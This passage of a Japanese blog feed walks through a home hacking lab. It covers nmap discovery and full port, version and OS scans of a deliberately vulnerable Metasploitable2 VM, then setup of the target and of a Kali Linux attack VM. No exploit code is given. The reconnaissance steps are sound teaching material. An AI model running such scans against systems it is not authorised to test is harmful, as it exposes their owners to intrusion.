IPアドレス：192.168.238.128/24

・Metasploitable2（ターゲットマシン）
名前：metasploitable
IPアドレス：192.168.238.130/24</pre>



<p><br>※実験用マシンの準備は以下ご参照ください。</p>



<p>　　・攻撃用マシン（Kali Linux）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<p>　　・ターゲットマシン（Metasploitable2）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/metasploitable-vmware/" title="Metasploitable2構築 ターゲットマシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-300x188.jpg 300w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1024x640.jpg 1024w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-768x480.jpg 768w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1536x960.jpg 1536w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-320x198.jpg 320w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920.jpg 1920w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Metasploitable2構築 ターゲットマシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。Metasploitable2の準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.11</div></div></div></div></a>
</div>



<h3 id="rtoc-8"  class="wp-block-heading">4-2.実験開始</h3>



<p>攻撃用マシン（Kali Linux）から以下コマンドを実行します。</p>



<pre class="wp-block-verse">$ nmap -sP 192.168.238.0/24</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="shell" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ nmap -sP 192.168.238.0/24                                                                                                                                                                                                          
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 10:08 EST
Nmap scan report for 192.168.238.2
Host is up (0.00074s latency).
Nmap scan report for 192.168.238.128
Host is up (0.00045s latency).
Nmap scan report for 192.168.238.130　←ターゲットマシン
Host is up (0.0028s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.68 seconds</pre>



<p>指定したネットワーク内にIPアドレス 192.168.238.130（ターゲットマシン）が確認できます。<br><br><br>次にターゲットマシンの開いているポート番号、サービス情報とOSの種類を調べます。</p>



<pre class="wp-block-verse">$ nmap -sV -O -p- 192.168.238.130</pre>



<p>-p-:1番から65535番までのポート番号を対象<br>-sV:サービスのバージョンを検出<br>-O:ターゲットのOSを特定</p>



<pre class="EnlighterJSRAW" data-enlighter-language="shell" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ nmap -sV -O -p- 192.168.238.130
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 10:26 EST
Nmap scan report for 192.168.238.130
Host is up (0.00047s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
32980/tcp open  java-rmi    GNU Classpath grmiregistry
35878/tcp open  nlockmgr    1-4 (RPC #100021)
38097/tcp open  mountd      1-3 (RPC #100005)
59425/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.87 seconds
</pre>



<p>検出されたポート番号のうち、特に気になるものは次の通りです。</p>



<p>・7行目　ポート21:vsfpd<br>・20行目 ポート1524:Metasploiteble root shell<br>・26行目 ポート5900:VNC<br><br><br>検出されたポート、サービスを脆弱性調査用のサイトで検索すると、<br>いくつか脆弱性を確認することができます。<br><br>例えば最初に見つけた<strong>ポート21</strong>の<strong>vsftpd 2.3.4</strong>向けのExploitを探すと、<br>「Backdoor Command Execution」という脆弱性があることがわかりました。<br>この脆弱性はリモートからコマンド実行を可能とするバックドアが含まれているようです。<br><br>ポートスキャンの実験はここまでとなります。</p>



<h2 id="rtoc-9"  class="wp-block-heading">6.まとめ</h2>



<p>nmapを使ったポートスキャンにより、脆弱性を発見することができました。<br>今回はあらかじめ脆弱性のあるホストをターゲットとして実験しましたが、<br>自身が管理している機器への調査や監査も可能です。</p>



<h2 id="rtoc-10"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Metasploitable2構築 ターゲットマシン</title>
		<link>https://eidoblog.com/metasploitable-vmware/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Fri, 10 Dec 2021 22:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=164</guid>

					<description><![CDATA[ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。
Metasploitable2の準備、基本設定を実施します。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="164" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.VMware</a></li><li class="rtoc-item"><a href="#rtoc-3">3.Metasploitable2のダウンロード</a></li><li class="rtoc-item"><a href="#rtoc-4">4.Metasploitable2の起動</a></li><li class="rtoc-item"><a href="#rtoc-5">5.日本語キーボードへの変更</a></li><li class="rtoc-item"><a href="#rtoc-6">6.静的IPの設定</a></li><li class="rtoc-item"><a href="#rtoc-7">7.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-8">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>ハッキングの実験をするにあたって、攻撃先マシン（ターゲット）の準備を行います。<br>安全性を考慮して独立したネットワークに準備したいため、<br>仮想化ソフトにMetasploitable2を構築します。</p>



<p><strong>Metasploitable2</strong>とは、あえて脆弱性が存在する状態で構成されたLinuxです。<br>Linuxに対するハッキングの基本的な流れを理解するために活用できます。</p>



<h2 id="rtoc-2"  class="wp-block-heading">2.VMware</h2>



<p>本記事では、「<strong>VMware Workstation Player</strong>」に仮想マシンを作成します。<br>VMware Workstation Playerは無料の仮想化ソフトとなっており、<br>検索すれば、導入方法がたくさん紹介されていると思います。<br>（今後、別記事で紹介するかも。。）</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.Metasploitable2のダウンロード</h2>



<p>以下ダウンロードページにアクセスします。</p>




<a rel="noopener" href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" title="Metasploitable -  Browse /Metasploitable2 at SourceForge.net" class="blogcard-wrap external-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard external-blogcard eb-left cf"><div class="blogcard-label external-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail external-blogcard-thumbnail"><img decoding="async" src="https://s.wordpress.com/mshots/v1/https%3A%2F%2Fsourceforge.net%2Fprojects%2Fmetasploitable%2Ffiles%2FMetasploitable2%2F?w=320&#038;h=198" alt="" class="blogcard-thumb-image external-blogcard-thumb-image" width="320" height="198" /></figure><div class="blogcard-content external-blogcard-content"><div class="blogcard-title external-blogcard-title">Metasploitable -  Browse /Metasploitable2 at SourceForge.net</div><div class="blogcard-snippet external-blogcard-snippet">Metasploitable is an intentionally vulnerable Linux virtual machine</div></div><div class="blogcard-footer external-blogcard-footer cf"><div class="blogcard-site external-blogcard-site"><div class="blogcard-favicon external-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" alt="" class="blogcard-favicon-image external-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain external-blogcard-domain">sourceforge.net</div></div></div></div></a>



<p>ダウンロードしたファイルを解凍し、[Metasploitable.vmx]をVMwareにインポートします。<br><img decoding="async" width="400" height="300" class="wp-image-134" style="width: 400px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali06.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali06.png 839w, https://eidoblog.com/wp-content/uploads/2021/12/kali06-300x225.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali06-768x577.png 768w" sizes="(max-width: 400px) 100vw, 400px" /></p>



<h2 id="rtoc-4"  class="wp-block-heading">4.Metasploitable2の起動</h2>



<p>VMwareの仮想マシンの再生ボタンから起動できます。<br><br>以下画面が表示されたら、初期ユーザ/パスワードを入力してログインします。<br>ユーザ名：msfadmin<br>パスワード：msfadmin<br><img decoding="async" width="600" height="333" class="wp-image-172" style="width: 600px;" src="https://eidoblog.com/wp-content/uploads/2021/12/Meta01.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/Meta01.png 720w, https://eidoblog.com/wp-content/uploads/2021/12/Meta01-300x166.png 300w" sizes="(max-width: 600px) 100vw, 600px" /></p>



<h2 id="rtoc-5"  class="wp-block-heading">5.日本語キーボードへの変更</h2>



<p>初期は英語キーボードとなってるため、日本語キーボードを使っているのであれば変更します。<br>※再起動すると英語キーボードに戻ります。</p>



<pre class="wp-block-verse">$ sudo loadkeys jp</pre>



<p><img decoding="async" width="700" height="69" class="wp-image-173" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/Meta02.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/Meta02.png 662w, https://eidoblog.com/wp-content/uploads/2021/12/Meta02-300x29.png 300w" sizes="(max-width: 700px) 100vw, 700px" /></p>



<h2 id="rtoc-6"  class="wp-block-heading">6.静的IPの設定</h2>



<p>デフォルトでは動的IPが割る振られています。<br>自動でIPが変わると攻撃を行う際に手間なので、静的IPに変更します。<br>まずは、現在のIPアドレスを確認します。</p>



<pre class="wp-block-verse">$ ifconfig</pre>



<p>現在のIPアドレス、サブネットマスク、デフォルトゲートウェイをメモします。<br>筆者は以下となってましたが、環境によって変化する可能性があります。<br><img decoding="async" width="700" height="298" class="wp-image-175" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/Meta04.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/Meta04.png 720w, https://eidoblog.com/wp-content/uploads/2021/12/Meta04-300x128.png 300w" sizes="(max-width: 700px) 100vw, 700px" /></p>



<p>viコマンドで以下ネットワーク設定を変更します。<br>※上記でメモしたアドレスを追加</p>



<pre class="wp-block-verse">$ sudo vi /etc/network/interfaces</pre>



<p>（編集前）<br><img decoding="async" width="700" height="48" class="wp-image-174" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/Meta03.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/Meta03.png 718w, https://eidoblog.com/wp-content/uploads/2021/12/Meta03-300x20.png 300w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>（編集後）<br><img decoding="async" width="700" height="95" class="wp-image-176" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/Meta05.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/Meta05.png 720w, https://eidoblog.com/wp-content/uploads/2021/12/Meta05-300x41.png 300w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>サービスを再起動し、アドレスが反映されているか確認します。</p>



<pre class="wp-block-verse">$ sudo /etc/init.d/networking restart
$ ifconfig</pre>



<p>ホストOSへPingが通ることを確認します。</p>



<pre class="wp-block-verse">$ ping 192.168.238.255 -b</pre>



<h2 id="rtoc-7"  class="wp-block-heading">7.まとめ</h2>



<p>攻撃先のマシンを構築しました。<br>ターゲットへのハッキング練習を行い、セキュリティの知識を学んでいきましょう。<br>他の記事では、Metasploitableへの疑似的な攻撃を紹介していきたいと思います。<br><br>攻撃用マシンの構築は以下をご覧ください。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<p><span class="bold-red">注意事項<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a></p>



<h2 id="rtoc-8"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Kali Linux 2021.2 構築 攻撃用マシン</title>
		<link>https://eidoblog.com/kali-vmware/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Wed, 08 Dec 2021 22:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=111</guid>

					<description><![CDATA[ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。
Kali Linuxの準備、基本設定を実施します。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="111" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.VMware</a></li><li class="rtoc-item"><a href="#rtoc-3">3.Kali Linuxのダウンロード</a></li><li class="rtoc-item"><a href="#rtoc-4">4.Kali Linuxの起動</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-5">4-1.仮想マシンの起動</a></li><li class="rtoc-item"><a href="#rtoc-6">4-2.ログイン</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-7">5.パッケージの更新</a></li><li class="rtoc-item"><a href="#rtoc-8">6.基本設定</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-9">6-1.スクリーンロックを無効にする</a></li><li class="rtoc-item"><a href="#rtoc-10">6-2.日本語化パッケージをインストール</a></li><li class="rtoc-item"><a href="#rtoc-11">6-3.日本語表示にする</a></li><li class="rtoc-item"><a href="#rtoc-12">6-4.日本語キーボードに対応</a></li><li class="rtoc-item"><a href="#rtoc-13">6-5.タイムゾーンを日本に設定する</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-14">7.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-15">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。<br>安全性を考慮して独立したネットワークに準備したいため、仮想化ソフトにKali Linuxを構築します。</p>



<p><strong>Kali Linux</strong>とはペネトレーションテスト用のLinuxディストリビューションです。<br>300以上のペネトレーションテスト用のプログラムが最初からインストールされています。<br>※ペネトレーションテストとは実際の攻撃手法を試みてシステムに脆弱性がないかどうかテストする手法です。</p>



<h2 id="rtoc-2"  class="wp-block-heading">2.VMware</h2>



<p>本記事では、「<strong>VMware Workstation Player</strong>」に仮想マシンを作成します。<br>VMware Workstation Playerは無料の仮想化ソフトとなっており、<br>検索すれば、導入方法がたくさん紹介されていると思います。<br>（今後、別記事で紹介するかも。。）</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.Kali Linuxのダウンロード</h2>



<p>以下ダウンロードページにアクセスします。</p>




<a rel="noopener" href="https://www.kali.org/get-kali/" title="Get Kali | Kali Linux" class="blogcard-wrap external-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard external-blogcard eb-left cf"><div class="blogcard-label external-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail external-blogcard-thumbnail"><img decoding="async" src="https://www.kali.org/images/kali-logo.svg" alt="" class="blogcard-thumb-image external-blogcard-thumb-image" width="320" height="198" /></figure><div class="blogcard-content external-blogcard-content"><div class="blogcard-title external-blogcard-title">Get Kali | Kali Linux</div><div class="blogcard-snippet external-blogcard-snippet">Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and...</div></div><div class="blogcard-footer external-blogcard-footer cf"><div class="blogcard-site external-blogcard-site"><div class="blogcard-favicon external-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://www.kali.org/get-kali/" alt="" class="blogcard-favicon-image external-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain external-blogcard-domain">www.kali.org</div></div></div></div></a>



<p>「Virtual Machines」をクリックします。<br><img decoding="async" width="750" height="379" class="wp-image-132" style="width: 750px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali01.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali01.png 1849w, https://eidoblog.com/wp-content/uploads/2021/12/kali01-300x152.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali01-1024x518.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali01-768x388.png 768w, https://eidoblog.com/wp-content/uploads/2021/12/kali01-1536x777.png 1536w" sizes="(max-width: 750px) 100vw, 750px" /><br><br>32bit/64bitが用意されているので、環境に合わせて選択します。<br>本記事では64bit版の「VMware」を使用します。<br>ダウンロードマークからダウンロードします。<br><img decoding="async" width="600" height="541" class="wp-image-133" style="width: 600px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali02.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali02.png 897w, https://eidoblog.com/wp-content/uploads/2021/12/kali02-300x271.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali02-768x693.png 768w" sizes="(max-width: 600px) 100vw, 600px" /><br><br>ダウンロードしたファイルを解凍します。<br>VMwareの「仮想マシンを開く」から、解凍したフォルダ内の[vmx]ファイルを開きます。<br><img decoding="async" width="400" height="300" class="wp-image-134" style="width: 400px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali06.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali06.png 839w, https://eidoblog.com/wp-content/uploads/2021/12/kali06-300x225.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali06-768x577.png 768w" sizes="(max-width: 400px) 100vw, 400px" /><br><br>インポート完了です。</p>



<h2 id="rtoc-4"  class="wp-block-heading">4.Kali Linuxの起動</h2>



<h3 id="rtoc-5"  class="wp-block-heading">4-1.仮想マシンの起動</h3>



<p>VMwareの仮想マシンの再生ボタンから起動できます。<br><br>GRUBブート画面が表示されます。<br><img decoding="async" width="700" height="395" class="wp-image-126" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali03.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali03.png 1277w, https://eidoblog.com/wp-content/uploads/2021/12/kali03-300x169.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali03-1024x578.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali03-768x434.png 768w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>そのまま数秒待てば、そのまま起動します。<br>すぐに起動したい場合は&#8221;Kali GNU/Linux&#8221;を選択し[Enter]キーを押下します。</p>



<h3 id="rtoc-6"  class="wp-block-heading">4-2.ログイン</h3>



<p>以下画面が表示されたら、初期ユーザ/パスワードを入力してログインします。<br>ユーザ名：kali<br>パスワード：kali<br><img decoding="async" width="700" height="392" class="wp-image-127" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali04.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali04.png 1273w, https://eidoblog.com/wp-content/uploads/2021/12/kali04-300x168.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali04-1024x574.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali04-768x430.png 768w" sizes="(max-width: 700px) 100vw, 700px" /></p>



<h2 id="rtoc-7"  class="wp-block-heading">5.パッケージの更新</h2>



<p>左上の黒いアイコンのターミナルを起動します。<br><img decoding="async" width="700" height="394" class="wp-image-141" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali12.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali12.png 1280w, https://eidoblog.com/wp-content/uploads/2021/12/kali12-300x169.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali12-1024x576.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali12-768x432.png 768w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>下記のコマンドを入力し、更新します。（しばらく時間がかかります）</p>



<pre class="wp-block-verse">$ sudo apt-get update
$ sudo apt-get upgrade</pre>



<h2 id="rtoc-8"  class="wp-block-heading">6.基本設定</h2>



<h3 id="rtoc-9"  class="wp-block-heading">6-1.スクリーンロックを無効にする</h3>



<p>デフォルトで5分間何も操作しないと、画面が自動でロックします。<br>解除するには再度パスワードを入力する必要があり、<br>とても手間なので、画面がロックしないように設定します。<br><br>画面左上のKali Linuxのアイコンから「Settings」&gt;「Power Manager」を開きます。<br><img decoding="async" width="700" height="394" class="wp-image-143" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali08.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali08.png 1275w, https://eidoblog.com/wp-content/uploads/2021/12/kali08-300x169.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali08-1024x576.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali08-768x432.png 768w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>「Display」タブのDisplay power managementをすべて0分（Never）に変更します。<br><img decoding="async" width="400" height="299" class="wp-image-144" style="width: 400px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali09.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali09.png 641w, https://eidoblog.com/wp-content/uploads/2021/12/kali09-300x224.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></p>



